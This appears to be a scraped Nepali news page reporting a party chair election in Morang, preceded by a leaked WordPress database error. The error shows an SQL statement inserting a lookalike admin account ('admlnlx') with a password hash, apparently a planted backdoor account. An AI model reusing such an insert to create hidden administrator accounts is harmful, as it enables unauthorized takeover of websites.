WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$ByeYGVa/a/qeboiVrT6BtoZQtaKJR//', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 18:15:33', '', 'admlnlx', 'admlnlx')
विराटनगर, पुस १२ –
सङ्घीय समाजवादी फोरम नेपाल मोरङको अध्यक्षमा राजकुमार यादव निर्वाचित हुनुभएको छ ।
विराटनगरमा सोमबार साँझ सम्पन्न भएको प्रथम एकता अधिवेशनबाट यादवले ४४० मत प्राप्त गरी विजयी हुनुभएको हो । उहाँका प्रतिस्पर्धी प्रमोद शर्माले ७१ मत प्राप्त गरेको निर्वाचन समितिका संयोजक पर्शुराम बस्नेतले जानकारी गराउनुभयो ।
निर्वाचित अध्यक्षले सचिव, सहसचिव र कोषाध्यक्षसमेत गरी ५१ जनालाई मनोनीत गर्ने व्यवस्था छ । पार्टीको विधानअनुसार कार्यसमिति ९१ सदस्यीय हुने सो पार्टीले जनाएको छ ।
मधेसी जनअधिकार फोरम, सङ्घीय समाजवादी पार्टी र खस क्षेत्री एकता समाज पार्टीबीच एकता भएर सङ्घीय समाजवादी फोरम नेपाल पार्टी गठन भएपछि यादव मोरङको कार्यवाहक अध्यक्ष हुनुहुन्थ्यो । – रासस